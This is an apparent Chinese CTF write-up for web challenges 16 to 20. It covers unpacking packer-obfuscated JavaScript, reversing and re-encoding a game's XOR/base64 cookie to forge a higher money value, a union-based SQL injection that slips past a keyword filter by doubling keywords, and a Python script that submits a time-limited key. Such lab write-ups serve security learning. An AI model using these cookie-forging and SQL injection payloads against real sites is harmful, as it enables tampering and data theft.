web16
学会如来神掌应该就能打败他了吧
题目地址
进入江湖,抓个包,发现三个js。
script.js base.js md5.js
分别打开后发现,md5.js、base.js没有什么异常,打开script.js后发现有packer加密。
我们先进行解密。下面是解密代码
<script>
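// Packer radix: word indices are written in base 62 (0-9, a-z, A-Z) by num().
// Declared with var so the script also runs under strict mode, where a bare
// `a=62` would throw a ReferenceError instead of creating a global.
var a = 62;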
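/**
 * Packs the JavaScript in the #code textarea into the
 * "eval(function(p,a,c,k,e,d){...})" form and writes it to #new_code.
 * Every \w+ token is replaced by its base-62 index (see num()); the original
 * tokens travel in the k array and the embedded unpacker swaps them back.
 * Reads the globals a (radix) and num(). Returns nothing.
 */
function encode() {
  var code = document.getElementById('code').value;
  // Collapse to a single line and escape single quotes: the packed source is
  // embedded in a single-quoted string literal at the end of this function.
  code = code.replace(/[\r\n]+/g, '');
  code = code.replace(/'/g, "\\'");
  // match() returns null when there is no word at all (e.g. an empty textarea);
  // fall back to an empty list instead of throwing in sort().
  var tokens = code.match(/\b(\w+)\b/g) || [];
  tokens.sort();
  // Sorted input means duplicates are adjacent, so one pass is enough to dedupe.
  var dict = [];
  var last = '';
  var i;
  for (i = 0; i < tokens.length; i++) {
    if (tokens[i] != last) dict.push(last = tokens[i]);
  }
  var len = dict.length;
  var ch;
  for (i = 0; i < len; i++) {
    ch = num(i);
    code = code.replace(new RegExp('\\b' + dict[i] + '\\b', 'g'), ch);
    // A token that encodes to itself needs no dictionary entry: the unpacker
    // falls back to the index string when k[c] is empty (d[e(c)]=k[c]||e(c)).
    if (ch == dict[i]) dict[i] = '';
  }
  document.getElementById('new_code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}("
    + "'" + code + "'," + a + "," + len + ",'" + dict.join('|') + "'.split('|'),0,{}))";
}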
/**
 * Base-62 digit string for an index: 0-9, then a-z, then A-Z (values 36..61
 * map to 'A'..'Z' through charCode + 29). Higher digits are produced by
 * recursing on c / a while c is not below the global radix a.
 * @param {number} c index to encode
 * @returns {string}
 */
function num(c) {
  var high = '';
  if (!(c < a)) {
    high = num(parseInt(c / a));
  }
  var digit = c % a;
  var low;
  if (digit > 35) {
    low = String.fromCharCode(digit + 29);
  } else {
    low = digit.toString(36);
  }
  return high + low;
}
// Executes the #code textarea contents as JavaScript in the page's own context.
// This is a direct eval: whatever is pasted runs with the page's full privileges.
function run() {
eval(document.getElementById('code').value);
}
// Unpacks an "eval(function(p,a,c,k,e,d){...})" string from #code and writes the
// restored source to #new_code. Stripping the leading "eval" leaves only the
// unpacker call, so evaluating it returns the unpacked source (the unpacker
// ends in `return p`) instead of executing that source. The unpacker function
// itself is still evaluated, so this is only meant for input in that packed form.
function decode() {
var code = document.getElementById('code').value;
code = code.replace(/^eval/, '');
document.getElementById('new_code').value = eval(code);
}
</script>
<div>JS文件加密解密</div>
<div>原脚本</div>
<textarea id="code" cols=80 rows=10>
</textarea>
<div>加密/解密后脚本</div>
<textarea id="new_code" cols=80 rows=10>
</textarea>
<div>
<input type=button onclick=encode() value=编码>
<input type=button onclick=run() value=执行>
<input type=button onclick=decode() value=解码>
</div>
把这段代码,写入decode.html,浏览器打开。
解密完成之后,再进行一下格式化。
在线工具地址:https://tool.oschina.net/codeformat/js/
/**
 * Looks up a cookie by name in document.cookie.
 * Entries are split on ';' and trimmed; the first one that starts with
 * "<cname>=" supplies the value. Returns "" when no such cookie exists.
 * @param {string} cname cookie name
 * @returns {string}
 */
function getCookie(cname) {
  var prefix = cname + "=";
  var parts = document.cookie.split(';');
  var idx = 0;
  while (idx < parts.length) {
    var entry = parts[idx].trim();
    if (entry.indexOf(prefix) === 0) {
      return entry.substring(prefix.length, entry.length);
    }
    idx++;
  }
  return "";
}
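/**
 * Reverses the cookie obfuscation: base64-decode, then for every character undo
 * the position-dependent XOR and the (i % 10) + 2 shift. No secret is involved,
 * so anyone holding the cookie can recover the plaintext (and, with
 * encode_create, write a modified one back).
 * @param {string} temp base64 text from the "user" cookie (already URL-decoded)
 * @returns {string} decoded plaintext
 */
function decode_create(temp) {
  var base = new Base64();
  var decoded = base.decode(temp);
  var plain = "";
  // Loop index declared locally: the pasted version used a bare `i`, which leaks
  // a global and throws a ReferenceError under strict mode.
  for (var i = 0; i < decoded.length; i++) {
    var ch = decoded[i].charCodeAt();
    ch = ch ^ i;
    ch = ch - ((i % 10) + 2);
    plain += String.fromCharCode(ch);
  }
  return plain;
}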
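/**
 * End-of-fight handler: derives the flag from the player's cookie and shows it.
 * The "user" cookie holds the URL-encoded, base64 + per-position XOR obfuscated
 * serialized player record; the segment after the one naming the "flag" field
 * (e.g. s:1:"0") supplies the key that is md5'd into flag{...}.
 * The state is kept entirely client-side with no integrity check, so the browser
 * can rewrite it and the server has no way to tell. Side effects only:
 * document.write, timers and an alert; nothing is returned.
 */
function ertqwe() {
  var temp_name = "user";
  var temp = getCookie(temp_name);
  temp = decodeURIComponent(temp);
  var mingwen = decode_create(temp);
  var ca = mingwen.split(';');
  var key = "";
  // `i` declared locally: the pasted version leaked an implicit global and
  // fails under strict mode.
  for (var i = 0; i < ca.length; i++) {
    // The value lives in the segment after the one containing "flag"; guard
    // against "flag" being the last segment so split() is not called on undefined.
    if (-1 < ca[i].indexOf("flag") && ca[i + 1] !== undefined) {
      key = ca[i + 1].split(":")[2];
    }
  }
  // s:1:"0" splits to ['s', '1', '"0"']; strip the two surrounding quotes.
  key = key.replace('"', "").replace('"', "");
  document.write('<img id="attack-1" src="image/1-1.jpg">');
  // Animation frames, one per second, before the flag alert at 5 s.
  var frames = ["image/1-2.jpg", "image/1-3.jpg", "image/1-4.jpg", "image/6.png"];
  frames.forEach(function (src, n) {
    setTimeout(function () {
      document.getElementById("attack-1").src = src;
    }, 1000 * (n + 1));
  });
  setTimeout(function () {
    alert("你使用如来神掌打败了蒙老魔,但不知道是真身还是假身,提交试一下吧!flag{" + md5(key) + "}");
  }, 5000);
}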
分析之后发现,这个游戏是通过cookie来保存角色数据的。
我们分析一下这个js,发现解密cookie的过程为
// Name of the cookie that carries the serialized player state.
var temp_name = "user";
// Raw cookie value as the browser stores it (still URL-encoded).
var temp = getCookie(temp_name);
// Undo the URL encoding first, then the base64 + per-position XOR/shift layer.
temp = decodeURIComponent(temp);
var mingwen = decode_create(temp);
复制解密代码到控制台下,已经解密出明文了。
那么思路来了
修改明文的金币数量→加密为密文→修改cookie→学习如来神掌→得到flag
作者使用的编辑工具为notepad++
第一步修改明文的金币数量:
O:5:"human":10:{s:8:"xueliang";i:940;s:5:"neili";i:837;s:5:"lidao";i:61;s:6:"dingli";i:59;s:7:"waigong";i:0;s:7:"neigong";i:0;s:7:"jingyan";i:0;s:6:"yelian";i:0;s:5:"money";i:99999999;s:4:"flag";s:1:"0";}
第二步加密为密文
既然解密是用 decodeURIComponent 和 decode_create,那么加密只需要逆向着来就好了。
我们发现js中没有encode_create 函数,那么我们就来自己写。
看一下encode_create
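/**
 * Inverse of decode_create: apply the (i % 10) + 2 shift, then XOR with the
 * position, then base64-encode. The steps run in the reverse order of the
 * decoder so that decode_create(encode_create(s)) === s.
 * NOTE(review): for positions i >= 256 the XOR can push a code unit above 255,
 * which Base64.encode cannot represent (charAt on an out-of-range index yields
 * ''); fine for the ~200-character record here, not for arbitrarily long input.
 * @param {string} temp plaintext to obfuscate
 * @returns {string} base64 text (still to be URL-encoded for the cookie)
 */
function encode_create(temp) {
  var base = new Base64();
  var shifted = "";
  // Loop index declared locally: the pasted version used a bare `i`, which leaks
  // a global and throws a ReferenceError under strict mode.
  for (var i = 0; i < temp.length; i++) {
    var ch = temp[i].charCodeAt();
    ch = ch + ((i % 10) + 2);
    ch = ch ^ i;
    shifted += String.fromCharCode(ch);
  }
  return base.encode(shifted);
}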
那么反着写decode_create
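/**
 * Reverses the cookie obfuscation: base64-decode, then for every character undo
 * the position-dependent XOR and the (i % 10) + 2 shift (the mirror image of
 * encode_create, whose steps run in the opposite order).
 * @param {string} temp base64 text from the "user" cookie (already URL-decoded)
 * @returns {string} decoded plaintext
 */
function decode_create(temp) {
  var base = new Base64();
  var decoded = base.decode(temp);
  var plain = "";
  // Loop index declared locally: a bare `i` leaks a global and throws a
  // ReferenceError under strict mode.
  for (var i = 0; i < decoded.length; i++) {
    var ch = decoded[i].charCodeAt();
    ch = ch ^ i;
    ch = ch - ((i % 10) + 2);
    plain += String.fromCharCode(ch);
  }
  return plain;
}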
在这里有个坑。
这个base在加密的时候进行了_utf8_encode(input)
而解密的时候,却注释掉了。
那么我们就需要把base加密时的 _utf8_encode(input)
也注释掉,才能保证密文被正确解密。
encode_create完明文之后,再
// temp2 is the encode_create() output; URL-encode it so it can be stored back as
// the cookie value (the page-side decode starts with decodeURIComponent).
var miwen = encodeURIComponent(temp2);
console.log(miwen);
明文就被加密好了。
最后完整代码
<script>
//base64
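/**
 * Minimal base64 codec over 8-bit character codes, used here as the outer
 * layer of the cookie obfuscation.
 * Changes from the pasted version: _keyStr, _utf8_encode and _utf8_decode are
 * local to the constructor instead of leaking as implicit globals (which also
 * throws a ReferenceError under strict mode), and the temporaries in
 * _utf8_decode are declared. The UTF-8 pre/post-processing stays disabled on
 * purpose: the site's decoder skips _utf8_decode, so encode() must not apply
 * _utf8_encode either or the site will not read back what was written.
 */
function Base64() {
  // private property
  var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

  // public method for encoding
  // Each character's code unit is taken as one byte; code units above 255 are
  // not representable (charAt on an out-of-range index yields '').
  this.encode = function (input) {
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;
    //input = _utf8_encode(input);   // intentionally disabled, see header comment
    while (i < input.length) {
      chr1 = input.charCodeAt(i++);
      chr2 = input.charCodeAt(i++);
      chr3 = input.charCodeAt(i++);
      enc1 = chr1 >> 2;
      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
      enc4 = chr3 & 63;
      // charCodeAt past the end is NaN: pad the last group with '=' (index 64).
      if (isNaN(chr2)) {
        enc3 = enc4 = 64;
      } else if (isNaN(chr3)) {
        enc4 = 64;
      }
      output = output +
        _keyStr.charAt(enc1) + _keyStr.charAt(enc2) +
        _keyStr.charAt(enc3) + _keyStr.charAt(enc4);
    }
    return output;
  };

  // public method for decoding
  this.decode = function (input) {
    var output = "";
    var chr1, chr2, chr3;
    var enc1, enc2, enc3, enc4;
    var i = 0;
    // Drop anything outside the alphabet (whitespace, stray characters).
    input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    while (i < input.length) {
      enc1 = _keyStr.indexOf(input.charAt(i++));
      enc2 = _keyStr.indexOf(input.charAt(i++));
      enc3 = _keyStr.indexOf(input.charAt(i++));
      enc4 = _keyStr.indexOf(input.charAt(i++));
      chr1 = (enc1 << 2) | (enc2 >> 4);
      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      // 64 is the '=' padding index: those bytes were never part of the input.
      if (enc3 != 64) {
        output = output + String.fromCharCode(chr2);
      }
      if (enc4 != 64) {
        output = output + String.fromCharCode(chr3);
      }
    }
    //output = _utf8_decode(output);   // intentionally disabled, see header comment
    return output;
  };

  // private method for UTF-8 encoding (kept for reference; not called)
  var _utf8_encode = function (string) {
    string = string.replace(/\r\n/g, "\n");
    var utftext = "";
    for (var n = 0; n < string.length; n++) {
      var c = string.charCodeAt(n);
      if (c < 128) {
        utftext += String.fromCharCode(c);
      } else if ((c > 127) && (c < 2048)) {
        utftext += String.fromCharCode((c >> 6) | 192);
        utftext += String.fromCharCode((c & 63) | 128);
      } else {
        utftext += String.fromCharCode((c >> 12) | 224);
        utftext += String.fromCharCode(((c >> 6) & 63) | 128);
        utftext += String.fromCharCode((c & 63) | 128);
      }
    }
    return utftext;
  };

  // private method for UTF-8 decoding (kept for reference; not called)
  var _utf8_decode = function (utftext) {
    var string = "";
    var i = 0;
    var c = 0;
    var c2 = 0;
    var c3 = 0;
    while (i < utftext.length) {
      c = utftext.charCodeAt(i);
      if (c < 128) {
        string += String.fromCharCode(c);
        i++;
      } else if ((c > 191) && (c < 224)) {
        c2 = utftext.charCodeAt(i + 1);
        string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
        i += 2;
      } else {
        c2 = utftext.charCodeAt(i + 1);
        c3 = utftext.charCodeAt(i + 2);
        string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
        i += 3;
      }
    }
    return string;
  };
}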
//getcookie
// Returns the value of cookie `cname` from document.cookie, or "" if absent.
// Entries are split on ';' and trimmed; the first one starting with "<cname>="
// supplies the value.
function getCookie(cname) {
  var wanted = cname + "=";
  var entries = document.cookie.split(';').map(function (s) { return s.trim(); });
  for (var k = 0; k < entries.length; k++) {
    if (entries[k].indexOf(wanted) !== 0) {
      continue;
    }
    return entries[k].substring(wanted.length, entries[k].length);
  }
  return "";
}
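/**
 * Reverses the cookie obfuscation: base64-decode, then for every character undo
 * the position-dependent XOR and the (i % 10) + 2 shift. No secret is involved,
 * so anyone holding the cookie can recover the plaintext (and, with
 * encode_create, write a modified one back).
 * @param {string} temp base64 text from the "user" cookie (already URL-decoded)
 * @returns {string} decoded plaintext
 */
function decode_create(temp) {
  var base = new Base64();
  var decoded = base.decode(temp);
  var plain = "";
  // Loop index declared locally: a bare `i` leaks a global and throws a
  // ReferenceError under strict mode.
  for (var i = 0; i < decoded.length; i++) {
    var ch = decoded[i].charCodeAt();
    ch = ch ^ i;
    ch = ch - ((i % 10) + 2);
    plain += String.fromCharCode(ch);
  }
  return plain;
}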
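/**
 * Inverse of decode_create: apply the (i % 10) + 2 shift, then XOR with the
 * position, then base64-encode, so that decode_create(encode_create(s)) === s.
 * NOTE(review): for positions i >= 256 the XOR can push a code unit above 255,
 * which Base64.encode cannot represent (charAt on an out-of-range index yields
 * ''); fine for the ~200-character record here, not for arbitrarily long input.
 * @param {string} temp plaintext to obfuscate
 * @returns {string} base64 text (still to be URL-encoded for the cookie)
 */
function encode_create(temp) {
  var base = new Base64();
  var shifted = "";
  // Loop index declared locally: a bare `i` leaks a global and throws a
  // ReferenceError under strict mode.
  for (var i = 0; i < temp.length; i++) {
    var ch = temp[i].charCodeAt();
    ch = ch + ((i % 10) + 2);
    ch = ch ^ i;
    shifted += String.fromCharCode(ch);
  }
  return base.encode(shifted);
}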
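/**
 * End-of-fight handler: derives the flag from the player's cookie and shows it.
 * The "user" cookie holds the URL-encoded, base64 + per-position XOR obfuscated
 * serialized player record; the segment after the one naming the "flag" field
 * (e.g. s:1:"0") supplies the key that is md5'd into flag{...}.
 * The state is kept entirely client-side with no integrity check, so the browser
 * can rewrite it and the server has no way to tell. Side effects only:
 * document.write, timers and an alert; nothing is returned.
 */
function ertqwe() {
  var temp_name = "user";
  var temp = getCookie(temp_name);
  temp = decodeURIComponent(temp);
  var mingwen = decode_create(temp);
  var ca = mingwen.split(';');
  var key = "";
  // `i` declared locally: a bare `i` leaks an implicit global and fails under
  // strict mode.
  for (var i = 0; i < ca.length; i++) {
    // The value lives in the segment after the one containing "flag"; guard
    // against "flag" being the last segment so split() is not called on undefined.
    if (-1 < ca[i].indexOf("flag") && ca[i + 1] !== undefined) {
      key = ca[i + 1].split(":")[2];
    }
  }
  // s:1:"0" splits to ['s', '1', '"0"']; strip the two surrounding quotes.
  key = key.replace('"', "").replace('"', "");
  document.write('<img id="attack-1" src="image/1-1.jpg">');
  // Animation frames, one per second, before the flag alert at 5 s.
  var frames = ["image/1-2.jpg", "image/1-3.jpg", "image/1-4.jpg", "image/6.png"];
  frames.forEach(function (src, n) {
    setTimeout(function () {
      document.getElementById("attack-1").src = src;
    }, 1000 * (n + 1));
  });
  setTimeout(function () {
    alert("你使用如来神掌打败了蒙老魔,但不知道是真身还是假身,提交试一下吧!flag{" + md5(key) + "}");
  }, 5000);
}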
// Edited plaintext: the serialized player record recovered from the cookie, with
// money set to 99999999 and every other field left as decoded.
var b = "O:5:\"human\":10:{s:8:\"xueliang\";i:940;s:5:\"neili\";i:837;s:5:\"lidao\";i:61;s:6:\"dingli\";i:59;s:7:\"waigong\";i:0;s:7:\"neigong\";i:0;s:7:\"jingyan\";i:0;s:6:\"yelian\";i:0;s:5:\"money\";i:99999999;s:4:\"flag\";s:1:\"0\";}"
// Re-apply the obfuscation (shift, XOR, base64) ...
var temp2 = encode_create(b);
// ... then URL-encode so the result can be used directly as the cookie value.
var miwen = encodeURIComponent(temp2);
console.log(miwen);
</script>
保存为html,在浏览器控制台下即可看到加密好的密文
UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeHxgUZ1liZxQMWEFDXl8EdUUOCAMJd016B34WUlFWWTVoATEABHV5P3Z2CmYgPTY5Pj90FSUUaRsfL2ZnYnYhCRMTGRQPQCcHKFIvEShXUlYCGQMbDQ4FXEcXREo%2FBTzBxKbu6fbrB%2BH%2Bps3nsLrP6dCs0LgR8fj1%2F%2B6y3%2B%2FapJ3XnJnkjNPf0NnRjpPD7u%2Fx8%2FH3j4mL98H4hviQzNDbq%2BaDuYb%2Fgur67PVJ
第三步修改cookie
打开burp,拦截修改cookie,发送。
金币已经修改好了。
第四步学习如来神掌
修改好cookie后,去商店一顿购买,学习如来神掌
第五步得到flag
学习好如来神掌,讨伐一下
web17
流量分析,wireshark打开,TCP流追踪得到flag
web18
试探过程如下
id=1’ 回显空白,可能是单引号闭合,字符型注入
id=1’ --+ 回显正常,字符型注入
id=1’ and 1=1 --+ 回显空白,可能过滤了and 或者空格
id=1’anandd 1=1 --+ 回显正常,过滤了and,双写绕过
id=1’ oorrder by 3 --+ 字段数为3
list.php?id=0’ uunionnion seselectlect 1,2,3–+
找到2,3为回显位置
爆数据库
list.php?id=0’ ununionion selselectect 1,2,database() --+
爆表名
list.php?id=0’ ununionion selselectect 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()–+
爆字段
list.php?id=0’ ununionion selselectect 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=‘flag’–+
取数据
list.php?id=0’ ununionion selselectect 1,2,flag from flag–+
得到flag
web19
做到这里,题目坏掉了,等修复好了之后,再来做。
web20
根据题目介绍,动态GET提交密文,?key=密文,就行了。
写好python脚本,提交就行了
(有时需要提交两三次,才能得到flag,可能是时间延迟的问题)
下面是完整python代码,由python2 编写。
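"""Fetch the dynamic key from the challenge page and submit it back as ?key=...

Written against Python 2; print() with a single argument behaves the same
there, so the script also runs unchanged on Python 3. `requests` is the only
dependency. The page text notes that the key is time-sensitive, so a
submission may have to be repeated once or twice.
"""
import requests

url = "http://123.206.31.85:10020/"

# One session so any cookies set by the first response accompany the submission.
session = requests.session()
# A timeout keeps a stalled server from hanging the script indefinitely.
respond = session.get(url, timeout=10)
respond.encoding = 'utf-8'
page = respond.text
# The key is read from a fixed offset of the response body (characters 9..41);
# the challenge prints it at that position, so adjust the slice if the page changes.
key = page[9:42]

# Kept as plain concatenation (no URL-encoding of the key) to match the original.
url2 = url + "?key=" + key
respond = session.get(url2, timeout=10)
print(url2)
respond.encoding = 'utf-8'
print(respond.text)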